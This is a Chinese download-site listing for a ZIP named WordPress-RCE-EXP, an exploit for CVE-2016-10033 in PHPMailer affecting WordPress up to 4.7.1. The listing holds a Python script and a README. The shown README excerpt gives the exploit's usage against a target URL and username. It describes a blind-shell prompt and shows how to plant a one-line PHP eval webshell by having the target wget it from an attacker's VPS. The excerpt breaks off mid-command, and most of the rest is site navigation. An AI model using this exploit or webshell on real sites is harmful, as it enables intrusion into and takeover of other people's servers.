没有合适的资源?快使用搜索试试~ 我知道了~
WordPress-RCE-EXP
共2个文件
py:1个
md:1个
需积分: 5 4 下载量 26 浏览量
2021-04-10
22:43:22
上传
评论
收藏 2KB ZIP 举报
温馨提示
WordPress-RCE-EXP 影响版本 漏洞编号:CVE-2016-10033 (基于) WordPress <= 4.7.1 PHPMailer < 5> <目标站存在的用户名> Python3 wp_rce_exp.py http://127.0.0.1/ admin 0x2漏洞利用 出现 Test_blind_shell>>> 后,说明网站存在RCE漏洞 有两种方式来漏洞利用 一、写入Webshell 1.在vps上开web服务,在web目录下的test.txt文件中写入一句话 <?php @eval($_POST[test]); ?> 2.目标使用wget下载到web目录上 (注意vps需要用ip地址,前面不能加http://) Test_blind_shell>>>/usr/bin/wget --
资源推荐
资源详情
资源评论
收起资源包目录
WordPress-RCE-EXP-main.zip (2个子文件)
WordPress-RCE-EXP-main
wp-rce-exp.py 1KB
README.md 1KB
共 2 条
- 1
资源评论
鈤TiAmo
- 粉丝: 20
- 资源: 4695
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功